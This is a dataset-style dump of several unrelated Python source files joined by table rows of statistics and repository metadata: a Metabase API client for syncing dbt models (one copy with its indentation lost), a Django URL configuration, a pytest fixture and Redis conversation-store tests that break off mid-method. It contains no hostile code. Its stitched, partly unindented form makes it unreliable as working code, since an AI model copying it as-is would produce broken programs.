if not sync_successful and time_after_wait <= deadline:
time.sleep(self._SYNC_PERIOD_SECS)
else:
break
return sync_successful
def models_compatible(
self, database_id: str, schema: str, models: Sequence
) -> bool:
"""Checks if models compatible with the Metabase database schema.
Arguments:
database_id {str} -- Metabase database ID.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
Returns:
bool -- True if schema compatible with models, false otherwise.
"""
_, field_lookup = self.build_metadata_lookups(database_id, schema)
are_models_compatible = True
for model in models:
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{model_name}"
if lookup_key not in field_lookup:
logging.warning(
"Model %s not found in %s schema", lookup_key, schema_name
)
are_models_compatible = False
else:
table_lookup = field_lookup[lookup_key]
for column in model.columns:
column_name = column.name.upper()
if column_name not in table_lookup:
logging.warning(
"Column %s not found in %s model", column_name, lookup_key
)
are_models_compatible = False
return are_models_compatible
def export_models(
self, database: str, schema: str, models: Sequence[MetabaseModel], aliases
):
"""Exports dbt models to Metabase database schema.
Arguments:
database {str} -- Metabase database name.
schema {str} -- Metabase schema name.
models {list} -- List of dbt models read from project.
aliases {dict} -- Provided by reader class. Shuttled down to column exports to resolve FK refs against relations to aliased source tables
"""
database_id = self.find_database_id(database)
if not database_id:
logging.critical("Cannot find database by name %s", database)
return
table_lookup, field_lookup = self.build_metadata_lookups(database_id, schema)
for model in models:
self.export_model(model, table_lookup, field_lookup, aliases)
def export_model(
self,
model: MetabaseModel,
table_lookup: dict,
field_lookup: dict,
aliases: dict,
):
"""Exports one dbt model to Metabase database schema.
Arguments:
model {dict} -- One dbt model read from project.
table_lookup {dict} -- Dictionary of Metabase tables indexed by name.
field_lookup {dict} -- Dictionary of Metabase fields indexed by name, indexed by table name.
aliases {dict} -- Provided by reader class. Shuttled down to column exports to resolve FK refs against relations to aliased source tables
"""
schema_name = model.schema.upper()
model_name = model.name.upper()
lookup_key = f"{schema_name}.{aliases.get(model_name, model_name)}"
api_table = table_lookup.get(lookup_key)
if not api_table:
logging.error("Table %s does not exist in Metabase", lookup_key)
return
# Empty strings not accepted by Metabase
if not model.description:
model_description = None
else:
model_description = model.description
table_id = api_table["id"]
if api_table["description"] != model_description and model_description:
# Update with new values
self.api(
"put",
f"/api/table/{table_id}",
json={"description": model_description},
)
logging.info("Updated table %s successfully", lookup_key)
elif not model_description:
logging.info("No model description provided for table %s", lookup_key)
else:
logging.info("Table %s is up-to-date", lookup_key)
for column in model.columns:
self.export_column(schema_name, model_name, column, field_lookup, aliases)
    def export_column(
        self,
        schema_name: str,
        model_name: str,
        column: MetabaseColumn,
        field_lookup: dict,
        aliases: dict,
    ):
        """Exports one dbt column to Metabase database schema.

        Updates the field's description, semantic type, visibility and
        (for "type/FK" columns) its foreign-key target, but only when the
        values in Metabase differ from the dbt metadata.

        Arguments:
            schema_name {str} -- dbt schema name (upper-cased by the caller).
            model_name {str} -- One dbt model name read from project.
            column {MetabaseColumn} -- One dbt column read from project.
            field_lookup {dict} -- Dictionary of Metabase fields indexed by name, indexed by table name.
            aliases {dict} -- Provided by reader class. Used to resolve FK refs against relations to aliased source tables.
        """
        table_lookup_key = f"{schema_name}.{model_name}"
        column_name = column.name.upper()
        field = field_lookup.get(table_lookup_key, {}).get(column_name)
        if not field:
            logging.error(
                "Field %s.%s does not exist in Metabase", table_lookup_key, column_name
            )
            return
        field_id = field["id"]
        api_field = self.api("get", f"/api/field/{field_id}")
        # Older Metabase versions expose the semantic type as "special_type";
        # pick whichever key this server returned.
        if "special_type" in api_field:
            semantic_type = "special_type"
        else:
            semantic_type = "semantic_type"
        fk_target_field_id = None
        if column.semantic_type == "type/FK":
            # Target table could be aliased if we parse_ref() on a source, so we caught aliases during model parsing
            # This way we can unpack any alias mapped to fk_target_table when using yml folder parser
            target_table = (
                column.fk_target_table.upper()
                if column.fk_target_table is not None
                else None
            )
            target_field = (
                column.fk_target_field.upper()
                if column.fk_target_field is not None
                else None
            )
            if not target_table or not target_field:
                logging.info(
                    "Passing on fk resolution for %s. Target field %s was not resolved during dbt model parsing.",
                    table_lookup_key,
                    target_field,
                )
            else:
                # Now we can trust our parse_ref even if it is pointing to something like source("salesforce", "my_cool_table_alias")
                # just as easily as a simple ref("stg_salesforce_cool_table") -> the dict is empty if parsing from manifest.json
                was_aliased = (
                    aliases.get(target_table.split(".", 1)[-1])
                    if target_table
                    else None
                )
                if was_aliased:
                    # Rebuild "SCHEMA.TABLE" with the alias substituted for the table part.
                    target_table = ".".join(
                        [target_table.split(".", 1)[0], was_aliased]
                    )
                logging.info(
                    "Looking for field %s in table %s", target_field, target_table
                )
                fk_target_field_id = (
                    field_lookup.get(target_table, {}).get(target_field, {}).get("id")
                )
                if fk_target_field_id:
                    logging.info(
                        "Setting target field %s to PK in order to facilitate FK ref for %s column",
                        fk_target_field_id,
                        column_name,
                    )
                    self.api(
                        "put",
                        f"/api/field/{fk_target_field_id}",
                        json={semantic_type: "type/PK"},
                    )
                else:
                    logging.error(
                        "Unable to find foreign key target %s.%s",
                        target_table,
                        target_field,
                    )
        # Nones are not accepted, default to normal
        if not column.visibility_type:
            column.visibility_type = "normal"
        # Empty strings not accepted by Metabase
        if not column.description:
            column_description = None
        else:
            column_description = column.description
        if (
            api_field["description"] != column_description
            or api_field[semantic_type] != column.semantic_type
            or api_field["visibility_type"] != column.visibility_type
            or api_field["fk_target_field_id"] != fk_target_field_id
        ):
            # Update with new values
            self.api(
                "put",
                f"/api/field/{field_id}",
                json={
                    "description": column_description,
                    semantic_type: column.semantic_type,
                    "visibility_type": column.visibility_type,
                    "fk_target_field_id": fk_target_field_id,
                },
            )
            logging.info("Updated field %s.%s successfully", model_name, column_name)
        else:
            logging.info("Field %s.%s is up-to-date", model_name, column_name)
def find_database_id(self, name: str) -> Optional[str]:
"""Finds Metabase database ID by name.
Arguments:
name {str} -- Metabase database name.
Returns:
str -- Metabase database ID.
"""
for database in self.api("get", "/api/database"):
if database["name"].upper() == name.upper():
return database["id"]
return None
def build_metadata_lookups(
self, database_id: str, schema: str, schemas_to_exclude: Iterable = None
) -> Tuple[dict, dict]:
"""Builds table and field lookups.
Arguments:
database_id {str} -- Metabase database ID.
schema {str} -- Metabase schema name.
Returns:
dict -- Dictionary of tables indexed by name.
dict -- Dictionary of fields indexed by name, indexed by table name.
"""
if schemas_to_exclude is None:
schemas_to_exclude = []
table_lookup = {}
field_lookup = {}
metadata = self.api(
"get",
f"/api/database/{database_id}/metadata",
params=dict(include_hidden=True),
)
for table in metadata.get("tables", []):
table_schema = table.get("schema", "public").upper()
table_name = table["name"].upper()
if schema:
if table_schema != schema.upper():
logging.debug(
"Ignoring Metabase table %s in schema %s. It does not belong to selected schema %s",
table_name,
table_schema,
schema,
)
continue
if schemas_to_exclude:
schemas_to_exclude = {
exclusion.upper() for exclusion in schemas_to_exclude
}
if table_schema in schemas_to_exclude:
logging.debug(
"Ignoring Metabase table %s in schema %s. It belongs to excluded schemas %s",
table_name,
table_schema,
schemas_to_exclude,
)
continue
lookup_key = f"{table_schema}.{table_name}"
table_lookup[lookup_key] = table
table_field_lookup = {}
for field in table.get("fields", []):
field_name = field["name"].upper()
table_field_lookup[field_name] = field
field_lookup[lookup_key] = table_field_lookup
return table_lookup, field_lookup
def api(
self,
method: str,
path: str,
authenticated: bool = True,
critical: bool = True,
**kwargs,
) -> Any:
"""Unified way of calling Metabase API.
Arguments:
method {str} -- HTTP verb, e.g. get, post, put.
path {str} -- Relative path of endpoint, e.g. /api/database.
Keyword Arguments:
authenticated {bool} -- Includes session ID when true. (default: {True})
critical {bool} -- Raise on any HTTP errors. (default: {True})
Returns:
Any -- JSON payload of the endpoint.
"""
headers: MutableMapping = {}
if "headers" not in kwargs:
kwargs["headers"] = headers
else:
headers = kwargs["headers"].copy()
if authenticated:
headers["X-Metabase-Session"] = self.session_id
response = requests.request(
method, f"{self.protocol}://{self.host}{path}", verify=self.verify, **kwargs
)
if critical:
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
if "password" in kwargs["json"]:
logging.error("HTTP request failed. Response: %s", response.text)
else:
logging.error(
"HTTP request failed. Payload: %s. Response: %s",
kwargs["json"],
response.text,
)
raise
elif not response.ok:
return False
response_json = json.loads(response.text)
# Since X.40.0 responses are encapsulated in "data" with pagination parameters
if "data" in response_json:
return response_json["data"]
return response_json
| 35.116667 | 149 | 0.54669 | import json
import logging
from typing import Any, Sequence, Optional, Tuple, Iterable, MutableMapping, Union
import requests
import time
from .models.metabase import MetabaseModel, MetabaseColumn
class MetabaseClient:
    """Thin client for the Metabase HTTP API used to synchronise dbt models.

    Opens a session on construction and exposes helpers to trigger schema
    syncs, check model/column visibility, and export dbt table and column
    descriptions into Metabase.
    """

    # How long to sleep between polling attempts in sync_and_wait().
    _SYNC_PERIOD_SECS = 5

    def __init__(
        self,
        host: str,
        user: str,
        password: str,
        use_http: bool = False,
        verify: Union[str, bool] = None,
    ):
        """Authenticate against *host* and keep the session ID for later calls."""
        self.host = host
        self.protocol = "http" if use_http else "https"
        self.verify = verify
        self.session_id = self.get_session_id(user, password)
        logging.info("Session established successfully")

    def get_session_id(self, user: str, password: str) -> str:
        """Obtain a new Metabase session ID for the given credentials."""
        return self.api(
            "post",
            "/api/session",
            authenticated=False,
            json={"username": user, "password": password},
        )["id"]

    def sync_and_wait(
        self, database: str, schema: str, models: Sequence, timeout: Optional[int]
    ) -> bool:
        """Trigger a schema sync and poll until *models* are visible or *timeout* expires.

        Returns True when every model/column is present in Metabase, False on
        timeout, invalid timeout, or unknown database.
        """
        if timeout is None:
            timeout = 30
        if timeout < self._SYNC_PERIOD_SECS:
            logging.critical(
                "Timeout provided %d secs, must be at least %d",
                timeout,
                self._SYNC_PERIOD_SECS,
            )
            return False
        database_id = self.find_database_id(database)
        if not database_id:
            logging.critical("Cannot find database by name %s", database)
            return False
        self.api("post", f"/api/database/{database_id}/sync_schema")
        deadline = int(time.time()) + timeout
        sync_successful = False
        while True:
            sync_successful = self.models_compatible(database_id, schema, models)
            time_after_wait = int(time.time()) + self._SYNC_PERIOD_SECS
            if not sync_successful and time_after_wait <= deadline:
                time.sleep(self._SYNC_PERIOD_SECS)
            else:
                break
        return sync_successful

    def models_compatible(
        self, database_id: str, schema: str, models: Sequence
    ) -> bool:
        """Return True when every model and column in *models* exists in Metabase."""
        _, field_lookup = self.build_metadata_lookups(database_id, schema)
        are_models_compatible = True
        for model in models:
            schema_name = model.schema.upper()
            model_name = model.name.upper()
            lookup_key = f"{schema_name}.{model_name}"
            if lookup_key not in field_lookup:
                logging.warning(
                    "Model %s not found in %s schema", lookup_key, schema_name
                )
                are_models_compatible = False
            else:
                table_lookup = field_lookup[lookup_key]
                for column in model.columns:
                    column_name = column.name.upper()
                    if column_name not in table_lookup:
                        logging.warning(
                            "Column %s not found in %s model", column_name, lookup_key
                        )
                        are_models_compatible = False
        return are_models_compatible

    def export_models(
        self, database: str, schema: str, models: Sequence[MetabaseModel], aliases
    ):
        """Export the descriptions of all dbt *models* to the named Metabase database.

        Arguments:
            database {str} -- Metabase database name.
            schema {str} -- Metabase schema name.
            models {Sequence[MetabaseModel]} -- dbt models read from project.
            aliases {dict} -- Alias map used to resolve FK refs against
                relations to aliased source tables.
        """
        database_id = self.find_database_id(database)
        if not database_id:
            logging.critical("Cannot find database by name %s", database)
            return
        table_lookup, field_lookup = self.build_metadata_lookups(database_id, schema)
        for model in models:
            self.export_model(model, table_lookup, field_lookup, aliases)

    def export_model(
        self,
        model: MetabaseModel,
        table_lookup: dict,
        field_lookup: dict,
        aliases: dict,
    ):
        """Export one dbt model's table description, then each of its columns."""
        schema_name = model.schema.upper()
        model_name = model.name.upper()
        lookup_key = f"{schema_name}.{aliases.get(model_name, model_name)}"
        api_table = table_lookup.get(lookup_key)
        if not api_table:
            logging.error("Table %s does not exist in Metabase", lookup_key)
            return
        # Empty strings are not accepted by Metabase.
        if not model.description:
            model_description = None
        else:
            model_description = model.description
        table_id = api_table["id"]
        if api_table["description"] != model_description and model_description:
            self.api(
                "put",
                f"/api/table/{table_id}",
                json={"description": model_description},
            )
            logging.info("Updated table %s successfully", lookup_key)
        elif not model_description:
            logging.info("No model description provided for table %s", lookup_key)
        else:
            logging.info("Table %s is up-to-date", lookup_key)
        for column in model.columns:
            self.export_column(schema_name, model_name, column, field_lookup, aliases)

    def export_column(
        self,
        schema_name: str,
        model_name: str,
        column: MetabaseColumn,
        field_lookup: dict,
        aliases: dict,
    ):
        """Export one dbt column's description, semantic type and FK target."""
        table_lookup_key = f"{schema_name}.{model_name}"
        column_name = column.name.upper()
        field = field_lookup.get(table_lookup_key, {}).get(column_name)
        if not field:
            logging.error(
                "Field %s.%s does not exist in Metabase", table_lookup_key, column_name
            )
            return
        field_id = field["id"]
        api_field = self.api("get", f"/api/field/{field_id}")
        # Older Metabase versions expose the semantic type as "special_type".
        if "special_type" in api_field:
            semantic_type = "special_type"
        else:
            semantic_type = "semantic_type"
        fk_target_field_id = None
        if column.semantic_type == "type/FK":
            target_table = (
                column.fk_target_table.upper()
                if column.fk_target_table is not None
                else None
            )
            target_field = (
                column.fk_target_field.upper()
                if column.fk_target_field is not None
                else None
            )
            if not target_table or not target_field:
                logging.info(
                    "Passing on fk resolution for %s. Target field %s was not resolved during dbt model parsing.",
                    table_lookup_key,
                    target_field,
                )
            else:
                # Resolve aliased source tables before looking up the target field.
                was_aliased = (
                    aliases.get(target_table.split(".", 1)[-1])
                    if target_table
                    else None
                )
                if was_aliased:
                    target_table = ".".join(
                        [target_table.split(".", 1)[0], was_aliased]
                    )
                logging.info(
                    "Looking for field %s in table %s", target_field, target_table
                )
                fk_target_field_id = (
                    field_lookup.get(target_table, {}).get(target_field, {}).get("id")
                )
                if fk_target_field_id:
                    logging.info(
                        "Setting target field %s to PK in order to facilitate FK ref for %s column",
                        fk_target_field_id,
                        column_name,
                    )
                    self.api(
                        "put",
                        f"/api/field/{fk_target_field_id}",
                        json={semantic_type: "type/PK"},
                    )
                else:
                    logging.error(
                        "Unable to find foreign key target %s.%s",
                        target_table,
                        target_field,
                    )
        # None is not accepted for visibility; default to "normal".
        if not column.visibility_type:
            column.visibility_type = "normal"
        # Empty strings are not accepted by Metabase.
        if not column.description:
            column_description = None
        else:
            column_description = column.description
        if (
            api_field["description"] != column_description
            or api_field[semantic_type] != column.semantic_type
            or api_field["visibility_type"] != column.visibility_type
            or api_field["fk_target_field_id"] != fk_target_field_id
        ):
            self.api(
                "put",
                f"/api/field/{field_id}",
                json={
                    "description": column_description,
                    semantic_type: column.semantic_type,
                    "visibility_type": column.visibility_type,
                    "fk_target_field_id": fk_target_field_id,
                },
            )
            logging.info("Updated field %s.%s successfully", model_name, column_name)
        else:
            logging.info("Field %s.%s is up-to-date", model_name, column_name)

    def find_database_id(self, name: str) -> Optional[str]:
        """Return the Metabase database ID for *name* (case-insensitive), or None."""
        for database in self.api("get", "/api/database"):
            if database["name"].upper() == name.upper():
                return database["id"]
        return None

    def build_metadata_lookups(
        self, database_id: str, schema: str, schemas_to_exclude: Iterable = None
    ) -> Tuple[dict, dict]:
        """Return (tables, fields) lookups keyed by "SCHEMA.TABLE" for *database_id*."""
        if schemas_to_exclude is None:
            schemas_to_exclude = []
        table_lookup = {}
        field_lookup = {}
        metadata = self.api(
            "get",
            f"/api/database/{database_id}/metadata",
            params=dict(include_hidden=True),
        )
        for table in metadata.get("tables", []):
            table_schema = table.get("schema", "public").upper()
            table_name = table["name"].upper()
            if schema:
                if table_schema != schema.upper():
                    logging.debug(
                        "Ignoring Metabase table %s in schema %s. It does not belong to selected schema %s",
                        table_name,
                        table_schema,
                        schema,
                    )
                    continue
            if schemas_to_exclude:
                schemas_to_exclude = {
                    exclusion.upper() for exclusion in schemas_to_exclude
                }
                if table_schema in schemas_to_exclude:
                    logging.debug(
                        "Ignoring Metabase table %s in schema %s. It belongs to excluded schemas %s",
                        table_name,
                        table_schema,
                        schemas_to_exclude,
                    )
                    continue
            lookup_key = f"{table_schema}.{table_name}"
            table_lookup[lookup_key] = table
            table_field_lookup = {}
            for field in table.get("fields", []):
                field_name = field["name"].upper()
                table_field_lookup[field_name] = field
            field_lookup[lookup_key] = table_field_lookup
        return table_lookup, field_lookup

    def api(
        self,
        method: str,
        path: str,
        authenticated: bool = True,
        critical: bool = True,
        **kwargs,
    ) -> Any:
        """Call the Metabase API and return the decoded JSON payload.

        Arguments:
            method {str} -- HTTP verb, e.g. get, post, put.
            path {str} -- Relative endpoint path, e.g. /api/database.

        Keyword Arguments:
            authenticated {bool} -- Include the session ID header. (default: {True})
            critical {bool} -- Raise on HTTP errors. (default: {True})
        """
        # Copy caller headers, then make sure the request actually carries the
        # (possibly augmented) dict. BUGFIX: the session ID used to be added to
        # a discarded copy whenever the caller supplied headers, so such
        # requests silently went out unauthenticated.
        headers: MutableMapping = dict(kwargs.get("headers") or {})
        if authenticated:
            headers["X-Metabase-Session"] = self.session_id
        kwargs["headers"] = headers
        response = requests.request(
            method, f"{self.protocol}://{self.host}{path}", verify=self.verify, **kwargs
        )
        if critical:
            try:
                response.raise_for_status()
            except requests.exceptions.HTTPError:
                # Don't log payloads that may carry credentials; tolerate
                # requests that had no JSON body (kwargs["json"] used to raise
                # KeyError here, masking the real HTTP error).
                payload = kwargs.get("json")
                if payload is None or "password" in payload:
                    logging.error("HTTP request failed. Response: %s", response.text)
                else:
                    logging.error(
                        "HTTP request failed. Payload: %s. Response: %s",
                        payload,
                        response.text,
                    )
                raise
        elif not response.ok:
            return False
        response_json = json.loads(response.text)
        # Since X.40.0 responses are wrapped in "data" with pagination parameters.
        if "data" in response_json:
            return response_json["data"]
        return response_json
| true | true |
1c33255da650a6e219e2d8259c06989b5ad06956 | 2,091 | py | Python | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | 1 | 2021-11-03T04:42:09.000Z | 2021-11-03T04:42:09.000Z | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | null | null | null | hknweb/urls.py | yousefh409/hknweb | d791e9f009d216a6e61f5a62a71077ff1098d9e7 | [
"MIT"
] | null | null | null | """hknweb URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .shortlinks import views as viewsShortlink
from .views import landing
from .views import users
# URL routing table. Django matches patterns top-down, so order matters: the
# shortlink catch-all ("<slug:temp>/") must stay LAST or it would shadow every
# other top-level route.
urlpatterns = [
    path("admin/", admin.site.urls),
    path('polls/', include('hknweb.polls.urls')),
    # Authentication and account management.
    path("accounts/", include("django.contrib.auth.urls")),
    path("accounts/create/", users.account_create, name="account-create"),
    path("accounts/settings/", users.account_settings, name="account-settings"),
    path("accounts/activate/", users.activate),
    path("about/", landing.about, name="about"),
    # Per-app URLconfs.
    path("events/", include("hknweb.events.urls")),
    path("reviewsessions/", include("hknweb.reviewsessions.urls")),
    path("exams/", include("hknweb.exams.urls")),
    path("alumni/", include("hknweb.alumni.urls")),
    path("tutoring/", include("hknweb.tutoring.urls")),
    path("cand/", include("hknweb.candidate.urls")),
    path("pages/", include("hknweb.markdown_pages.urls")),
    path("markdownx/", include("markdownx.urls")),
    path("elections/", include("hknweb.elections.urls")),
    path("auth/", include("social_django.urls", namespace="social")),
    path("", landing.home, name="home"),
    # Catch-all: any remaining single-segment slug is treated as a shortlink.
    path("<slug:temp>/", viewsShortlink.openLink),
]
# Serve uploaded media straight from Django in development only.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 41.82 | 80 | 0.702056 | from django.contrib import admin
from django.urls import include
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from .shortlinks import views as viewsShortlink
from .views import landing
from .views import users
# URL routing table. Django matches patterns top-down, so order matters: the
# shortlink catch-all ("<slug:temp>/") must stay LAST or it would shadow every
# other top-level route.
urlpatterns = [
    path("admin/", admin.site.urls),
    path('polls/', include('hknweb.polls.urls')),
    # Authentication and account management.
    path("accounts/", include("django.contrib.auth.urls")),
    path("accounts/create/", users.account_create, name="account-create"),
    path("accounts/settings/", users.account_settings, name="account-settings"),
    path("accounts/activate/", users.activate),
    path("about/", landing.about, name="about"),
    # Per-app URLconfs.
    path("events/", include("hknweb.events.urls")),
    path("reviewsessions/", include("hknweb.reviewsessions.urls")),
    path("exams/", include("hknweb.exams.urls")),
    path("alumni/", include("hknweb.alumni.urls")),
    path("tutoring/", include("hknweb.tutoring.urls")),
    path("cand/", include("hknweb.candidate.urls")),
    path("pages/", include("hknweb.markdown_pages.urls")),
    path("markdownx/", include("markdownx.urls")),
    path("elections/", include("hknweb.elections.urls")),
    path("auth/", include("social_django.urls", namespace="social")),
    path("", landing.home, name="home"),
    # Catch-all: any remaining single-segment slug is treated as a shortlink.
    path("<slug:temp>/", viewsShortlink.openLink),
]
# Serve uploaded media straight from Django in development only.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
1c332573b838a8eb88b2d6b5b813b8b4fa3e8fc9 | 342 | py | Python | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | autotest/tests/login/conftest.py | BillionsRichard/pycharmWorkspace | 709e2681fc6d85ff52fb25717215a365f51073aa | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:https://github.com/BillionsRichard
@software: PyCharm
@time: 2020/11/1 10:53
"""
import pytest
@pytest.fixture(scope="package", autouse=True)
def st_login():
    """Package-scoped autouse fixture wrapping every test in this package.

    Prints a setup marker ("初始化" = initialise) before the package's tests
    run and a teardown marker ("清除" = clean up) after they finish.
    """
    print("初始化---login")
    yield
    print("清除---login")
| 14.869565 | 46 | 0.684211 |
import pytest
@pytest.fixture(scope="package", autouse=True)
def st_login():
    """Package-scoped autouse fixture wrapping every test in this package.

    Prints a setup marker ("初始化" = initialise) before the package's tests
    run and a teardown marker ("清除" = clean up) after they finish.
    """
    print("初始化---login")
    yield
    print("清除---login")
| true | true |
1c3325c5abfa60aab2337e73ceec6e344c0c323f | 3,960 | py | Python | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | cdoebler1/AIML2 | ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | test/programytest/storage/stores/nosql/redis/store/test_conversations.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | import unittest
import programytest.storage.engines as Engines
from programy.dialog.conversation import Conversation
from programy.dialog.question import Question
from programy.storage.stores.nosql.redis.config import RedisStorageConfiguration
from programy.storage.stores.nosql.redis.engine import RedisStorageEngine
from programy.storage.stores.nosql.redis.store.conversations import RedisConversationStore
from programytest.client import TestClient
class MockRedisConversationStore(RedisConversationStore):
    """Test double for RedisConversationStore that can fail on demand.

    When the corresponding flag is set, the read/write hook raises instead of
    delegating to the real store.
    """

    def __init__(self, storage_engine, fail_write=False, fail_read=False):
        RedisConversationStore.__init__(self, storage_engine)
        self._fail_write = fail_write
        self._fail_read = fail_read

    def _write_conversation(self, client_context, conversation):
        if self._fail_write is True:
            raise Exception("Mock exception")
        # BUGFIX: super(MockRedisConversationStore) created an *unbound* super
        # object, so the delegating call raised AttributeError instead of
        # invoking the parent implementation.
        super()._write_conversation(client_context, conversation)

    def _read_conversation(self, client_context, conversation):
        if self._fail_read is True:
            raise Exception("Mock exception")
        super()._read_conversation(client_context, conversation)
class RedisConversationStoreTests(unittest.TestCase):
    """Integration tests for RedisConversationStore.

    All tests are skipped unless a Redis engine is available (see
    programytest.storage.engines).
    """
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_initialise(self):
        """The store keeps a reference to the engine it was built with."""
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = RedisConversationStore(engine)
        self.assertEqual(store.storage_engine, engine)
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_conversations_storage(self):
        """A stored conversation round-trips with properties, sentiment and question data."""
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = RedisConversationStore(engine)
        client = TestClient()
        client_context = client.create_client_context("user1")
        conversation1 = Conversation(client_context)
        conversation1.properties['ckey1'] = "cvalue1"
        conversation1.properties['ckey2'] ="cvalue2"
        question1 = Question.create_from_text(client_context, "Hello There")
        question1.sentence(0).response = "Hi"
        question1.sentence(0)._positivity = 0.5
        question1.sentence(0)._subjectivity = 0.6
        question1.properties['qkey1'] = "qvalue1"
        question1.properties['qkey2'] = "qvalue2"
        conversation1.record_dialog(question1)
        store.store_conversation(client_context, conversation1)
        conversation2 = Conversation(client_context)
        store.load_conversation(client_context, conversation2)
        self.assertIsNotNone(conversation2)
        self.assertEqual(conversation2.properties['ckey1'], "cvalue1")
        self.assertEqual(conversation2.properties['ckey2'], "cvalue2")
        self.assertEqual(conversation2.questions[0].sentence(0).response, "Hi")
        self.assertEqual(conversation2.questions[0].sentence(0)._positivity, 0.5)
        self.assertEqual(conversation2.questions[0].sentence(0)._subjectivity, 0.6)
        self.assertEqual(conversation2.questions[0].properties['qkey1'], "qvalue1")
        self.assertEqual(conversation2.questions[0].properties['qkey2'], "qvalue2")
        store.empty()
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_conversations_storage_exception_on_save_load(self):
        """Exercise store/load through the mock store.

        NOTE(review): both fail flags are False and nothing is asserted, so
        despite its name this test never provokes or checks an exception —
        confirm the intended flag values / assertRaises were not lost.
        """
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = MockRedisConversationStore(engine, fail_write=False, fail_read=False)
        client = TestClient()
        client_context = client.create_client_context("user1")
        conversation1 = Conversation(client_context)
        store.store_conversation(client_context, conversation1)
        conversation2 = Conversation(client_context)
        store.load_conversation(client_context, conversation2)
| 39.6 | 91 | 0.736869 | import unittest
import programytest.storage.engines as Engines
from programy.dialog.conversation import Conversation
from programy.dialog.question import Question
from programy.storage.stores.nosql.redis.config import RedisStorageConfiguration
from programy.storage.stores.nosql.redis.engine import RedisStorageEngine
from programy.storage.stores.nosql.redis.store.conversations import RedisConversationStore
from programytest.client import TestClient
class MockRedisConversationStore(RedisConversationStore):
    """Test double for RedisConversationStore that can fail on demand.

    When the corresponding flag is set, the read/write hook raises instead of
    delegating to the real store.
    """

    def __init__(self, storage_engine, fail_write=False, fail_read=False):
        RedisConversationStore.__init__(self, storage_engine)
        self._fail_write = fail_write
        self._fail_read = fail_read

    def _write_conversation(self, client_context, conversation):
        if self._fail_write is True:
            raise Exception("Mock exception")
        # BUGFIX: super(MockRedisConversationStore) created an *unbound* super
        # object, so the delegating call raised AttributeError instead of
        # invoking the parent implementation.
        super()._write_conversation(client_context, conversation)

    def _read_conversation(self, client_context, conversation):
        if self._fail_read is True:
            raise Exception("Mock exception")
        super()._read_conversation(client_context, conversation)
class RedisConversationStoreTests(unittest.TestCase):
    """Integration tests for RedisConversationStore.

    All tests are skipped unless a Redis engine is available (see
    programytest.storage.engines).
    """
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_initialise(self):
        """The store keeps a reference to the engine it was built with."""
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = RedisConversationStore(engine)
        self.assertEqual(store.storage_engine, engine)
    @unittest.skipIf(Engines.redis is False, Engines.redis_disabled)
    def test_conversations_storage(self):
        """A stored conversation round-trips with properties, sentiment and question data."""
        config = RedisStorageConfiguration()
        engine = RedisStorageEngine(config)
        engine.initialise()
        store = RedisConversationStore(engine)
        client = TestClient()
        client_context = client.create_client_context("user1")
        conversation1 = Conversation(client_context)
        conversation1.properties['ckey1'] = "cvalue1"
        conversation1.properties['ckey2'] ="cvalue2"
        question1 = Question.create_from_text(client_context, "Hello There")
        question1.sentence(0).response = "Hi"
        question1.sentence(0)._positivity = 0.5
        question1.sentence(0)._subjectivity = 0.6
        question1.properties['qkey1'] = "qvalue1"
        question1.properties['qkey2'] = "qvalue2"
        conversation1.record_dialog(question1)
        store.store_conversation(client_context, conversation1)
        conversation2 = Conversation(client_context)
        store.load_conversation(client_context, conversation2)
        self.assertIsNotNone(conversation2)
        self.assertEqual(conversation2.properties['ckey1'], "cvalue1")
        self.assertEqual(conversation2.properties['ckey2'], "cvalue2")
        self.assertEqual(conversation2.questions[0].sentence(0).response, "Hi")
        self.assertEqual(conversation2.questions[0].sentence(0)._positivity, 0.5)
